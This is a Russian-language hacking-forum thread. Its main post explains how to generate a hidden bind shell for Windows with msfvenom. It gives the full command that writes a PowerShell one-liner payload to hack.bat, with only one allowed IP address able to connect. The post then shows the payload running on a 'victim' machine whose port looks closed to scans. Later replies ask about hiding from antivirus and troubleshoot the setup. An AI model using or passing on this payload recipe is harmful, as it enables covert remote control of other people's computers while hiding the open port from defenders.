ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Этичный хакинг или пентестинг (https://forum.antichat.xyz/forumdisplay.php?f=209)
-   -   Скрытый BIND SHELL на PowerShell (https://forum.antichat.xyz/showthread.php?t=558627)

<~DarkNode~> 16.12.2016 02:35

https://forum.antichat.xyz/attachmen...44071da0be.png


Привет колеги. Это будет коротенький пост из серии MustKnow(Нужно Знать). Как бы ничего нового но я посчитал нужным кинуть в копилку форума описания этого метода.
Ничего нового мы изобретать с вами не будем,а воспользуемся обычной генерацией полезной нагрузки средствами msfvenom,и я лишь немного прокомментирую этот способ полученияBIND SHELL-а.

И так, давайте для начала посмотрим все опции которые возможны при создании нашего скрытого бинд шелла,а так же глянем описания(Рекомендую всегда читать описания!):

Код:


Код:

msfvenom -p windows/shell_hidden_bind_tcp --payload-options
https://forum.antichat.xyz/attachments/4768203/1.png

Как видим из списка опций - есть обязательный параметр AHOST ([Allowed IP Adress|Разрешенный айпишник]) И в описании читаем о том ,что мы поднимаем листенер на порту ,которой указывается опционально "параметр LPORT", и если мы будем стучатся на этот порт с айпишника который мы указали в параметре AHOST - то нам будет прилетать шелл,но если это будет любой другой айпи адресс - то удаленная машина будет отвечать RST пакетом и порт для соединения будет закрыт.Таким образом обнаружить открытый порт никто кроме нас не сможет(ну если конечно с нашего айпишника никто не будет сканит)

Давайте все же протестируем. Создадим полезную нагрузку:

Код:


Код:

msfvenom -p windows/shell_hidden_bind_tcp AHOST=192.168.137.137 lport=4444 -f psh-cmd -o hack.bat
AHOST -- разрешенный айпи (в моем случае 192.168.137.137)
lport-- порт для листенера
-f psh-cmd -- формат полезной нагрузки ( в моем случает однострочная команда для powershell)

https://forum.antichat.xyz/attachments/4768203/2.png


Я специально для наглядности указал не свой айпи что бы показать как это работает.
Дальше запустим на стороне жертвы и попробуем просканировать на 4444 порт.

https://forum.antichat.xyz/attachments/4768203/3.png


https://forum.antichat.xyz/attachments/4768203/4.png


https://forum.antichat.xyz/attachments/4768203/5.png



Как видите порт закрыт. Давайте сменим свой айпи на 192.168.137.137 и попробуем снова.

https://forum.antichat.xyz/attachments/4768203/6.png



Проверим шелл:

https://forum.antichat.xyz/attachments/4768203/7.png



Все работает с указанного айпи)
Надеюсь кому то будет полезным)
Всем спасибо)

<~DarkNode~> 16.12.2016 22:51

Цитата:


Bafomet сказал(а):

это скрытие от пользователя, системы или антивиря?


Это способ получение консоли удаленной машины с возможностью подключения только определенного айпи адреса,тоесть подключится к жертве можно будет только с того айпи,который мы указали в параметре AHOST. Это своего рода скрытие открытого порта у жертвы для всех остальных участников сети.

ghostphisher 18.12.2016 22:32

Я наверное самый пентестер неудачный =))))

PORT STATE SERVICE
4567/tcp closed tram

Делаю все по списку Четко, видтать win xp не пробиваемая система =)))

jonni_vu 05.03.2018 21:47

У меня при запуске shella на вирт. wind7 постоянно порт open. shell получал с разных ahost. Почему?настроен сетевой мост.


Время: 06:20